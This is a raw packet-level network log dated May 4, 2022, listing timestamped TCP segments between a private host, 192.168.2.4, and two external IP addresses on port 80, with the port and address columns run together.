                                                        May 4, 2022 16:19:19.130011082 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:19.130034924 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:19.130059958 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:19.130070925 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:19.130076885 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:19.130115986 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:19.130261898 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:19.130290031 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:19.130315065 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:19.130326033 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:19.130337000 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:19.130366087 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:19.130390882 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:19.326271057 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:19.343645096 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:19.626909018 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:19.626939058 CEST8049761185.189.151.28192.168.2.4
                                                        May 4, 2022 16:19:19.627015114 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:19:19.627073050 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:20:16.125454903 CEST4976180192.168.2.4185.189.151.28
                                                        May 4, 2022 16:21:18.485114098 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.554804087 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.559094906 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.561359882 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.631016970 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.631387949 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.631411076 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.631433010 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.631458044 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.631479979 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.631503105 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.631525993 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.631547928 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.631570101 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.631594896 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.634099960 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.634702921 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.703301907 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.703368902 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.703413010 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.703454018 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.703474045 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.703520060 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.703924894 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.703979015 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704027891 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704071045 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704114914 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704160929 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704202890 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704247952 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704297066 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704329967 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704350948 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704396963 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704441071 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.704520941 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.706489086 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.706518888 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.706545115 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.775760889 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775790930 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775810957 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775826931 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775847912 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775868893 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775888920 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775909901 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775929928 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775950909 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775973082 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.775995016 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776010036 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776030064 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776050091 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776071072 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776093006 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776124001 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776153088 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776174068 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776195049 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776216984 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776245117 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776267052 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776288033 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776309967 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776331902 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776352882 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776374102 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776393890 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776415110 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776448965 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776489019 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776516914 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776536942 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776559114 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776581049 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776604891 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776626110 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.776647091 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.777396917 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.780314922 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.780375957 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.780385971 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.780440092 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.846627951 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.846658945 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.846683025 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.846705914 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.846744061 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.846755028 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.846788883 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.846793890 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.846817970 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.846832037 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.846856117 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.846873999 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.846895933 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.846911907 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.846931934 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.846951962 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.846982002 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.847013950 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.849520922 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849555016 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849589109 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849652052 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849662066 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.849685907 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849711895 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849715948 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.849744081 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849760056 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.849776030 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849807978 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849812031 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.849841118 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849849939 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.849903107 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849925995 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.849936008 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849968910 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.849977016 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850001097 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850039005 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850078106 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850083113 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850089073 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850094080 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850120068 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850131035 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850167990 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850193024 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850203037 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850235939 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850258112 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850266933 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850300074 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850316048 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850321054 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850331068 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850347042 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850357056 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850373983 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850379944 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850403070 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850405931 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850429058 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850430012 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850452900 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850469112 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850486994 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850502968 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850531101 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850544930 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850577116 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850583076 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850603104 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850630045 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850644112 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850665092 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850667000 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850688934 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850711107 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850716114 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850734949 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850756884 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850776911 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850779057 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850801945 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850824118 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850826025 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850838900 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850871086 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850879908 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850893021 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850918055 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850935936 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850953102 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.850958109 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850980043 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.850981951 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851001978 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851010084 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851022959 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851037979 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851062059 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851080894 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851098061 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851103067 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851125956 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851125956 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851151943 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851161003 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851181984 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851212978 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851213932 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851234913 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851260900 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851278067 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851303101 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851314068 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851342916 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851353884 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851365089 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851392031 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851414919 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851421118 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851458073 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851479053 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851481915 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851504087 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851505995 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851527929 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851548910 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851551056 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851555109 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851586103 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851588011 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851613998 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851619005 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851641893 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851650000 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851680994 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851712942 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851717949 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851741076 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851768017 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851768017 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851794004 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.851804972 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851834059 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.851866007 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916172028 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916198969 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916223049 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916265965 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916270018 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916290045 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916325092 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916330099 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916368961 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916371107 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916404009 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916410923 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916439056 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916462898 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916466951 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916528940 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916538954 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916553020 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916589975 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916610003 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916610003 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916635036 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916667938 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916678905 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916687012 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916709900 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916733980 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916763067 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916775942 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916804075 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916810989 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916829109 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916863918 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916867971 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916898012 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916924000 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.916925907 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.916982889 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.921539068 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921562910 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921587944 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921606064 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921627998 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921652079 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921760082 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921788931 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921811104 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921827078 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921849012 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921879053 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921901941 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921922922 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921947002 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.921969891 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922009945 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922032118 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922055960 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922077894 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922101974 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922126055 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922311068 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922336102 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922358036 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922385931 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922405005 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922415972 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922442913 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922467947 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922529936 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922559023 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922703981 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922734022 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922761917 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922791004 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922842026 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922967911 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.922996998 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.923027039 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.923057079 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.923084974 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.926552057 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.926583052 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.926681042 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.926717997 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.926757097 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.986505032 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.986555099 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.986596107 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.986635923 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.986639023 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.986670971 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.986674070 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.986712933 CEST8049823193.56.146.127192.168.2.4
                                                        May 4, 2022 16:21:18.986728907 CEST4982380192.168.2.4193.56.146.127
                                                        May 4, 2022 16:21:18.986753941 CEST8049823193.56.146.127192.168.2.4
